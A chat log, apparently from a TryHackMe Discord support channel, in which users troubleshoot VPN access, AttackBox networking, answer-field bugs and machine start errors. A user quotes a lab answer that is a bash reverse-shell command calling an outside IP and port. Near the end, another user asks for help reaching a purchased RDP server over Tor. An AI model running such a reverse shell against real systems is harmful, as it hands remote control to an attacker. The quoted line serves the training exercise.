windows machines generally don't respond to pings from vpns or ips not in their subnet and network
but the domain controller should respond somehow
and thank you so much for the reply 🙏
Gave +1 Rep to @plush bay (current: #3 - 1878)
yeah but in the first 2 tasks it tells you how to check if you got connected and can talk with the dc
Yes, I followed all the steps including this one but no luck
@wind wedge
Please wait patiently for the support team to reply back, accounts and stuff isn't dealt with over Discord.
Check whether you have an interface called breachad
Probably not, so download the VPN config file for the Breaching AD network and run it with openvpn: that will give you a breachad interface
I am pretty sure you can ping THMDC afterwards
I’ll take a look tomorrow Support is now closed 🙂
do I have to use VPN config file on the attackbox ?
I can't install shell
ok thanks, please solve it as soon as possible
Gave +1 Rep to @wind wedge (current: #52 - 150)
As Scrubz said please don’t use discord for active support queries.
hey
I know this is weird, but consider this a workaround to get you going
I will try and get back to you
Thank you so much
Gave +1 Rep to @upbeat quarry (current: #113 - 64)
.
ok i will not in the future but I waited a lot for this please solve it as soon as possible
It works !
Thank you so much 🙏
Gave +1 Rep to @upbeat quarry (current: #107 - 65)
You can use this trick for all THM network rooms while on the AttackBox
I will defntily do. I appreciate it
dogcat ctf is so baddd
I'm stuck on the foothold on this one if I recall 😅
Just to add on what has been said, if you did send out a couple of emails in the past week, chances are, your ticket has been pushed down the queue (every time you did so), please be patient and THM Support will surely get back to you.
It is fun, but haven't had the chance to dedicate some time to it due to work. Hopefully I get some time this weekend. 😄
It's rated medium but I think that the technique is quite easy 😉 Good luck!
About getting shellsAbout getting shells
Hello i need help im on windows fundamentals 3 , task 3. question is asking "the above image, which area needs immediate attention?"
and i am tried answer "Virus & threat protection" its saying its wrong
hi i need help
intro to logs, task 4 "Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?" this question
I enter the correct one, and it comes up as wrong
Because there is a bug with & in the answers, you should drop the & character when filling in the answer field
Is there a & character in your answer? If so, drop it when you fill in the answer field
/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"
i love you no homo
How should I respond?
The bug affects &, > and possibly other special characters
It happens that you have both & and > in your answer
So, try dropping all of these with this:
bin/bash -i /dev/tcp/34.253.159.159/9999 01
Consider this a workaround till THM comes with a fix
Let's use the right channel, now we are working next to each other and answer peoples questions twice
Because this is the wrong channel 😅
Some are asking in multiple channels
I did as you advised, but it still doesn't show that the answer is correct.
There is probably too much removed...
agreed
And which is the correct channel?
Please guide me, I'll follow: which channel should I go to?
#room-help, but I was not nessecarily talking about you
#room-help for room questions, #site-support for VPN questions etc. We both answered Tha.God in different channels you know ;)
yh, I usually see multiposts too late
Yepp thats why
Please post your question in #room-help
when i am in a room, the room freezes or disconnects any clues on why this happens
I would consider disabling extensions in your browser, especially in my experience any Dark Mode extension
i will give that a try thank you
Gave +1 Rep to @upbeat quarry (current: #102 - 68)
Hi, I am having issues with the Linux fundamentals part 1 room, specifically on the section of “an introduction to shell operators” and am having issues with the questions. The questions:
"If we wanted to run a command in the background, what operator would we want to use?"
and
"Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be?"
I am entering the correct answers and am being told they are not correct. I have verified with the video that these are the correct answers but they are still being counted as wrong. I logged out and cleared cookies and came back but am still having the same issues.
i came here for the same thing but in the room-help channel they addressed it as a bug and said its being worked on
Thank you!
Gave +1 Rep to @minor agate (current: #2204 - 1)
just gotta keep truckin huh?
Upload ID is required
error
why?
?
Please provide more details about the problem
I changed my account, but the error kept coming
mmm
Can you verify and send a screenshot?
ok
ok
I don't know that error tbh
mm
why...
please
someone help me
What did you do to get that issue?
nothing
Thank you @wind wedge for solving my issue I appreciate your hard work and all the support team thanks again❤️
Does anyone know what is the usage of discord token
@brave owl
Yeah blackout did something for me too today
+rep @wind wedge 💖
Gave +1 Rep to @wind wedge (current: #52 - 151)
+rep @wind wedge 💖
Gave +1 Rep to @wind wedge (current: #51 - 152)
Staff are aware of any/all questions that require a symbol to answer a question.
This is includes Linux Fundemental 1, Linux Harderning and Wireshark
I have the same issue with burpsuite intruder is their a way around this?
Yeah check pinned posts in #room-help
I am doing OWASP Juice Shop in Task 4 I have to brute force a website with 1049 words in the world list and it is taking so long (an hour and a half + ) is it normal? #room-help
ONE AND A HALF?
No that's not really normal
The rule at tryhackme is that a bruteforce should be max 5minutes
What are you trying to bruteforce and which command are you using?
burp suite
In that case, which options
Hi all! I've issues in using my THM AttackBox in AD rooms. I've started the network, restarted various times the attackbox from the network and I am still unable to ping the DC... therefor I cannot proceed and cannot setup DNS. Can someone help me pls?
Oh noo
I think you should run your VPN file in the attackbox
So you could just download it to your host, copy the content and paste it in a .ovpn file in the attackbox
Based on the info of the network, it says that the THM AttackBox is already connected to the room network and I can ping the DC. So it was not clear for me I need to setup the VPN as well
You can ping the DC with 100% packet loss yeah 😂
burp suite and I am bruteforcing Owasp Juice Shop
But sometimes that doesnt work and you need to setup openvpn in the attackbox
Okay. Can you verify and send some screenshots of what you are doing?
I could not find an article, please try again.
Ok great! Will do that... but just might use my own host then 😄
@brave owl
Can do that too :)
wait your host?
You mean your host pc?
my own VM as attackbox
Yeah right
in linux fundamentals 1
If we wanted to run a command in the background, what operator would we want to use?
Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be
not working even tho i enter the correct answer
Hello everyone,
I can't do any room since yesterday. My attackbox is not in the room network.
I was doing the latéral movement and pivoting room
Download the VPN config file for the relevant network and use it with openvpn command That will add the relevant interface and get you going
I am using my corporate computer. It is not allowed.
Check the Pinned Messages of #room-help
I do not want to push over the red line, but with the AttackBox you are accessing an in-browser computer that is part of THM infrastructure inside AWS cloud So it is not like you are opening a VPN tunnel from your corporate network
Failing that, you would have to turn to a VM running locally on some PC you have
Ok I Will try
To make it clear, the point is you run the openvpn file from the attackbox. Not from your own pc in your coperate network
And like Shy1 said, that's not in your coperates network
thanks for helping wrong email
😂
Gave +1 Rep to @stiff barn (current: #61 - 121)
That's what I thought 😂
Hi everyone, i have dome issue to connect to the MISP platform throught the Ip adress generate in the room MISP. Does it occurs to you too ?
Happy hacking 
And what are the issues exactly?
If you verify you can
@cobalt nest
Try with http
same issue
It works. Thanks and sorry for my bad english.
Gave +1 Rep to @upbeat quarry (current: #99 - 70)
i'll skip the scenario Event for this module for now i'get back to it later to see if it works then
Can you ping 10.10.10.10? That would confirm you are on THM network
thanks scrubz
Gave +1 Rep to @weary spindle (current: #1 - 2708)
and owasp top 10 part 1 😄
any/all questions.
yeah just kidding 😉
Sorry i have already left the room cause i' m out but i'll be back to you when i reconnect. Sorry
No worries: do not hurry, I am confronted like you with the same error
Oh ok i was thinking i was the only one.
I have restarted the target several times: same issue (AttackBox or Kali VM)
Found this from @weary spindle while searching for MISP in Discord:
#room-help message
That simple 🙃
@cobalt nest
I tried the adress with only the Http one and it failed but i'll try to just test the one you mentionned to me
I'll keep you in touch
Just a thought for the follow-up: please use the #room-help channel, as this issue is room-specific
Getting an error when trying to start attackbox. Says I am only allowed to have 3 open but am unable to locate where they are and terminate them. Any thoughts?
The AttackBox resides in a browser, so locating it is just a matter of reviewing all the open tabs of all your open browser windows
Thank you.
I dont have additional tabs open and am still getting the same error message.
So how many browsers you have currently running (out of Chrome, Firefox, Edge, Opera, etc.)
+rep @upbeat quarry
Gave +1 Rep to @upbeat quarry (current: #96 - 72)
I have one browser open. DuckDuckGo
that DuckDuckGo with only one tab open, right?
Correct
Shy1 this isn't about browser tabs
It's about target machines
There is a script to terminate them somewhere
Can't find it :(
Sorry @amber perch , I may be looking at your question the wrong way
No worries. Is there additional information you need from me?
Just wait, maybe other people will jump in I am going to search Discord for similar issue
Appreciate the help.
Another thought, on your browser, do you have a history of tryhackme pages you have visited: that would include all the ones where you would have started a target machine
No DO NOT!!!
10-4
So, if you can sort chronologically the tryhackme pages you have visited for the past hours, you could visit them one by one to see whether the associated target (or multiple associated targets) are still running
That may be a bit tedious, but we are not talking about dozens of machines I figure
I will sift through them.
Either way. thought should terminate once they hit their expiration time. Correct?
correct
Found this script, going through it now
#site-support message
@upbeat quarry Thank you for all your help.
Gave +1 Rep to @upbeat quarry (current: #95 - 73)
Well, there are further messages about that script in #general starting about from this one:
#general message
Reading through the lines, it may not be a good idea to use that script (although it is still pinned) It looks like it is about using THM API, and whether it is acceptable to do so
So I better stay clear of it
Do not multipost, I have just answered in #room-help
can anyone tell i am not able to connect to openvpn for machines tried to change the vpn with different servers but still not able to connect to machines??
Have you ever been able to connect to THM VPN before?
Has anyone seen this "Upload ID is required" alert when starting machines? I have been experiencing this issue for two days across multiple rooms, logging out and back in seems to help 25% of the time...
yes i connect may be 3to4 month ago
I have not experienced that myself
Can you provide more context: on AttackBox or your local VM, is it just annoying or is it impacting functionality?
Also, please provide screenshot if possible (you may have to verify first)
thats why i play only offline room no connection req but i want to solve those room
Yeah I open a conversation with support, it is when I start machines... and yes its impacting me quite a bit... however it is intermittent. sometimes logging out an in seems to alleviate the issue, also since I asked I have gotten the machine started, but yes it is preventing me from starting machines across multiple rooms. I have been able to work around it, but I had never seen it before until yesterday, and I have done almost 400 rooms
Hi guys, I am unable to answer questions on tryhackme. Do I need to pay subscription fees before I can be allowed to answer questions?
What do you mean with "offline room"? My experience with THM is that you start a target machine that becomes online after typically 60 seconds, and has to stay online so that you can interact with it
You should be abe to answer questions for free rooms (i. e. that do not require a subscription)
You can find free rooms like this:
https://tryhackme.com/r/hacktivities/search?page=1
offline room means like OSINT and reverse engineering room which just provide a file for investigation
Whenever I input the correct answer I always get error message
ahh that must be why I couldnt provide the screen
Understood
So, maybe your VPN config file is a bit too old: I would consider regenerating one, if you have not done that already like today
I tried all methods regenerate even I do chatgpt search but it's not connecting
There is only one way to regenerate THM VPN configuration files: by going to https://tryhackme.com/r/access
Hi All
The question that included an symbol in the answer should now be resolved
Please let us know if there are any issues
Yes I done it not working but hack the box vpn is working fine for every room don't know why THM not working
I am unsure about the verification to share the screenshot, I thought I was verified. unsure.
Confirmed working on 2 rooms where the answer was &
Have you regenerated the VPN config file recently? Do you remember which VPN server you used?
In Discord, you type /verify and provide the information it wants (something like a token from your THM profile)
I tried yesterday and the server I think AU or EU regular 1
I will try some VPN servers that work for me, and then suggest you use them
Just wait
Ok frnd
@upbeat quarry it's indeed alright to use it
indeed thank you that is done
This is the alert I have been getting with some frequency... when starting machines.
None of the EU-regular-X worked for me, but AU-regular-1 just worked fine for me (I am in Europe) Could you try that one?
Wait I'll try and get back to you
Not even 3?
Please also provide the context:
- VM vs. AttackBox
- sub vs. free
- annoying or impacts performance
- etc.
@wind wedge you may find this interesting?
No, tried again: it stops progress after 10 lines of output
Can you share the errors in your console please
And EU-regular-2 stops with a fatal error
I saw another user with the same error today too. Never seen it before.
Here
This one:
#site-support message
I am run Kali on a Live USB
subscription not active at this time
Yeah😂
I would say its more than annoying
if you cant start the machies then you cant do much
Yup thx men finally it's working after a long time thanks again frnd
Gave +1 Rep to @upbeat quarry (current: #95 - 74)
Understood
So happy for you
BTW IN-regular-1 worked also for me
I’m using the free room and still unable to answer questions. This has left me stuck on a single question for days now.
I check that one is not working for me IN regular 1
I wonder whether the issue has to do with your broswer: which one are you using?
Can you consider trying with another broswer?
Also, could it be you are using extensions in your browser: you might one want to disable them for the timebeing
👀
Or isn't it?😅
Oh sorry, thought I turned it off...
no worries
I don’t think it has to do with my browser. I am using google chrome latest version. I also tried to do it on my phone, and experience the same issue.
Understood
Is LIve Kali your only option? My experience with that is that after using for a long time (like 2-3 hours), Firefox starts acting funny, depending on the amount of resources you have (like how much RAM)
Have you been in a room where you have to use an attacking machine against a target?
No
No
Do you have a VM with, say, Kali or another OS installed?
Yeah its not my live, and its not firefox either because I was using Brave, I have always kept firefox set up for my 8080, I just started messing with zen browser actually. So the problem started yesterday, on multiple browsers, and is intermittent, in addition to that I have been doing multiple rooms a day, and having this same issue regarding the "Upload ID", unfortunately live is my only option, I have a Macbook that is EOL, I have tried lots of solutions, I do use Virtual Box, but I prefer the Live in the end which can be fully up to date, and I get more of the bare metal feel, I also put a high speed usb behind that though and paid the Cost. I actually love my Linux setup. I took the paint off the keys... and it took me to 1443 on the platform. I had my identity stolen in a sim swap in California, and that is a long story to do with the FBI Napa Investigation... basically I lost everything, including my home, it is a really messed up story, and how i got into all this stuff, because some really messed up stuff happened to me. Point being... yes live is my only option, I have to fix my keys and stuff and get creative... I wouldn't have it any other way, and I love this Macbook. I am thinking about setting up and Arch soon. Anyways It wont launch machines.
what I have been doings:
logging out and logging back in
ctrl + shift + r
it goes away and comes back
anyways all good
Maybe I have run out of ideas
Consider the question earlier of @wind wedge :
#site-support message
Hopefully you will get progress that way
yeah I will get them when it happens again sorry didn't see this.
Symbol issue has been sorted
Have you tried typing reset?
where do i do that at?
Let me take a step back. By reset, what do you want to achieve?
i want to start over, i am on the Upload Vulnerabilities room and all of the links i need to go to say "hmm were having trouble finding that site"
i was up to task 5 but i am having issues uploading a photo
i have been at this for over 2 hours
i still can open googl.com and other website
am i missing something? i did the /ect/host step
Is there any way to further specify the types of rooms you want to work on? For example, I'm wanting to focus specifically on buffer overflow stuff, but when I search for buffer overflow I still see a bunch of results that aren't really related like Metasploit: Introduction for example.
What does the /etc/hosts file look like?
I would say no to your question
Instead of searching, I would browse learning paths and modules
i copy and pasted the ip address and the overwrite.uploadvuln.thm ...
Are you using the attackbox or VM?
the attackbox
What happens when you typ the IP in the browser bar?
i get the following message: Please read the instructions in task one. You must access this server with one of the following virtual hosts:
Then you may have done something wrong in the hosts file. Could you share a sceenshot of its contents?
You'll need for verify first.
@copper terrace
Yeah, i've already done this. I found a few, but I wanted to only focus on BOFs. Thanks for the attempt.
Gave +1 Rep to @upbeat quarry (current: #86 - 78)
i got it to work i am not sure what i did when i disconnected my ip address changed i went in and changed the ip address that may have been it
is anyone else having an issue where any room you enter just loads a blank, white page?🙃
Not seen this myself Do you experience that with different browsers?
oh jeez. now i feel like a dummy😭
thank you, another browser worked
Not dummy at all: you had me sweating because somebody earlier reported not being able to enter answers anywhere, and I could not get to the bottom of it
So, my reaction is more like: phew!, found it
lol i'm glad i could help, then!
Hi,
Can anyone help me?
When I try to connect to an RDP Server which i bought from the seller LOSSANTOS, it says lost connection to the rdp server.
I use remmina on ubuntu.
How can I fix this issue ,I searched everything online but nothing works.
I´ve tried changing tne security setting and more but nothing works
or are there any alternatives?
My connecton is Vmworkstation -> Tor+Vpn-> Remmina->and then i have a problem setting it up
Please help
Context? What page is this on? What are you trying to do?
We can't help very well without more information

Have you tried to access it using a different browser?
Cleared your browser cache and login again?
Yes I tried
But
I doesn't work
Tested on my end and it seems it doesn't work as well. I'll try it using a different browser in a bit and let you know.
Hey I cannot start HackPark machine got Upload ID error.
Me too bri
Bro
Lamo
@naive dust Can you start any machine cause I can't?
I'll try
